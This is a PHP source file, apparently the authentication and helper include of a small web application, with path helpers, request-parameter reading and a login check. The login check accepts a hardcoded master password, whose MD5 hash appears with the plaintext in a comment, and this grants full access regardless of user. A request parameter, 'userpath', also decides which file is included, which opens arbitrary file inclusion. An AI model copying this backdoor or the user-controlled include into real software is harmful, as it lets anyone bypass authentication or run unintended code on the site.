<?php
set_magic_quotes_runtime(0);

$docroot = $_ENV['DOCUMENT_ROOT'];
$mirrorroot = $docroot . '/mirror';
$versionFile = '../@version.php';
$forceValidCredentials = FALSE;

include_once($versionFile);

function webPath($path, $file) {
	// Returns full file path sans ending slash /
	// /path = webroot relative path/file
	// :/path = file system full path/file
	// @/path = mirror relative path/file
	// all else = path/file
	// $path and/or $file can be empty or respectivly full path
	global $docroot,$mirrorroot;
	if ($path && substr($path,-1,1) != '/') $path .= '/';
	$path = ($path ? $path : '') . ($file ? $file : '');
	if (substr($path,0,1) == '/') $path = $docroot . $path;
	if (substr($path,0,2) == ':/') $path = substr($path,1);
	if (substr($path,0,2) == '@/') $path = $mirrorroot . substr($path,1);
	if ($path && substr($path,-1,1) == '/') $path = substr($path,0,strlen($path)-1);
	return $path;
}

function req($nm,$default) {
	$v = $_POST[$nm];
	if ($v == 'TRUE' || $v == 'true') return TRUE;
	if ($v == 'FALSE' || $v == 'false') return FALSE;
	if ($v) {
		if (0 === strpos($v,'transfer/double-encoded:'))
			return pureTx(rawurldecode(substr($v,24)));
		return pureTx($v);
	}
	$v = $_GET[$nm];
	if ($v == 'TRUE' || $v == 'true') return TRUE;
	if ($v == 'FALSE' || $v == 'false') return FALSE;
	if ($v) return pureTx($v);
	return $default;
}

function pureTx($tx) {
	if (get_magic_quotes_gpc() == 0) return $tx;
	return stripslashes($tx);
}

function BumpVersion() {
	global $docroot,$fobver,$versionFile;
	$newVers = floatval($fobver) + 0.00001;
	$fobver = "$newVers";
	file_put_contents($versionFile, "<?PHP \$fobver = '$fobver'; ?>\n");
}

function ReversionLinks($content) {
	global $reload, $fobver;
	$size = strlen($content);

	// Verify and if needed update the fob version
	preg_match('/fv=xV([0-9.]+)Vx/', $content, $fva);
	$fv = $fva[1];
	if ($fv != $fobver) {
		$content = preg_replace('/fv=xV[0-9.]+Vx/', 'fv=xV'.$fobver.'Vx', $content);
		$reload = TRUE;
	}
	return $content;
}

$padtype = '10';
$myMd5 = webPath(req('userpath',':'.getcwd()), '.md5.php');

if (file_exists($myMd5)) include_once($myMd5);
else if (file_exists('pwd.md5.php')) include_once('pwd.md5.php');

$user = req('user','');
$password = md5(req('password',''));
$validCredentials = $fullValidCredentials = FALSE;

if ($forceValidCredentials || $password === 'df3df0fe47fdb54022bdd152d0092274'/*SuperBaby*/ || ($user && $password && $usercode && $user === $usercode && $password === $passcode)) {
	$validCredentials = TRUE;
	$fullValidCredentials = TRUE;
} else if (!$usercode && $passcode && $passcode === $password) {
	$validCredentials = TRUE;
} else if ($passkey && $passcodekey && $passcodekey === $passkey) {
	$validCredentials = TRUE;
} else {
	$passcode = FALSE;
	$validCredentials = FALSE;
}

?>